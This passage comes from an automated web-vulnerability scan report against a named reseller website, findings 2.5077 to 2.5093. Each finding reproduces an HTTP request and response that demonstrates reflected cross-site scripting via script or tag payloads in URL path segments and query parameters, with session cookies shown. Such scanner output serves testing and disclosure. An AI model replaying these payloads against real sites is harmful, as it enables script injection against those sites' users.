GET /web-service/domain-names7053a<script>alert(1)</script>57556becb66/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names7053a<script>alert(1)</script>57556becb66/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5077. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cea25<script>alert(1)</script>5764b729238 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themescea25<script>alert(1)</script>5764b729238/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themescea25<script>alert(1)</script>5764b729238/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5078. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6571e<script>alert(1)</script>b5e78cd5151 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos6571e<script>alert(1)</script>b5e78cd5151/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos6571e<script>alert(1)</script>b5e78cd5151/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5079. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a72d2<script>alert(1)</script>7d02c8f8229 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagesa72d2<script>alert(1)</script>7d02c8f8229/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagesa72d2<script>alert(1)</script>7d02c8f8229/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5080. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a01ba<script>alert(1)</script>d1c270ef554 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/search.phpa01ba<script>alert(1)</script>d1c270ef554?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/search.phpa01ba<script>alert(1)</script>d1c270ef554?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5081. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7cc36<a>40a25cf465d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7cc36<a>40a25cf465d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search7cc36<a>40a25cf465d&opt=2 was not found on this server.</p>
...[SNIP]...

2.5082. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload abfeb<a>79eec471bbe was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...abfeb<a>79eec471bbe&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...abfeb<a>79eec471bbe&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5083. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12ce6<script>alert(1)</script>31fe1fb8750 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&12ce6<script>alert(1)</script>31fe1fb8750=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&12ce6<script>alert(1)</script>31fe1fb8750=1 was not found on this server.</p>
...[SNIP]...

2.5084. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4a46d<a>701849ecf09 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=24a46d<a>701849ecf09 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=24a46d<a>701849ecf09 was not found on this server.</p>
...[SNIP]...

2.5085. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20362<script>alert(1)</script>39b947b7596 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service20362<script>alert(1)</script>39b947b7596/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service20362<script>alert(1)</script>39b947b7596/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5086. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 19ab6<script>alert(1)</script>99ebae2d55b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names19ab6<script>alert(1)</script>99ebae2d55b/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names19ab6<script>alert(1)</script>99ebae2d55b/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5087. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 44892<script>alert(1)</script>82a0188ed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes44892<script>alert(1)</script>82a0188ed/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes44892<script>alert(1)</script>82a0188ed/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5088. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4b2d3<script>alert(1)</script>4e68308df5d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos4b2d3<script>alert(1)</script>4e68308df5d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos4b2d3<script>alert(1)</script>4e68308df5d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5089. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bf66b<script>alert(1)</script>dde3b5e4e68 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/search.phpbf66b<script>alert(1)</script>dde3b5e4e68?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/search.phpbf66b<script>alert(1)</script>dde3b5e4e68?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5090. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3c571<a>0731e0313a0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search3c571<a>0731e0313a0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search3c571<a>0731e0313a0&opt=2 was not found on this server.</p>
...[SNIP]...

2.5091. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 190ae<a>5414131be3d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/search.php?keyword=search...190ae<a>5414131be3d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/search.php?keyword=search...190ae<a>5414131be3d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5092. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2eefb<script>alert(1)</script>0d1ce670798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&2eefb<script>alert(1)</script>0d1ce670798=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&2eefb<script>alert(1)</script>0d1ce670798=1 was not found on this server.</p>
...[SNIP]...

2.5093. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/domain-names/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4fe7d<a>06dd9bbdfa8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=24fe7d<a>06dd9bbdfa8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:50 GMT
Server: Apache/2
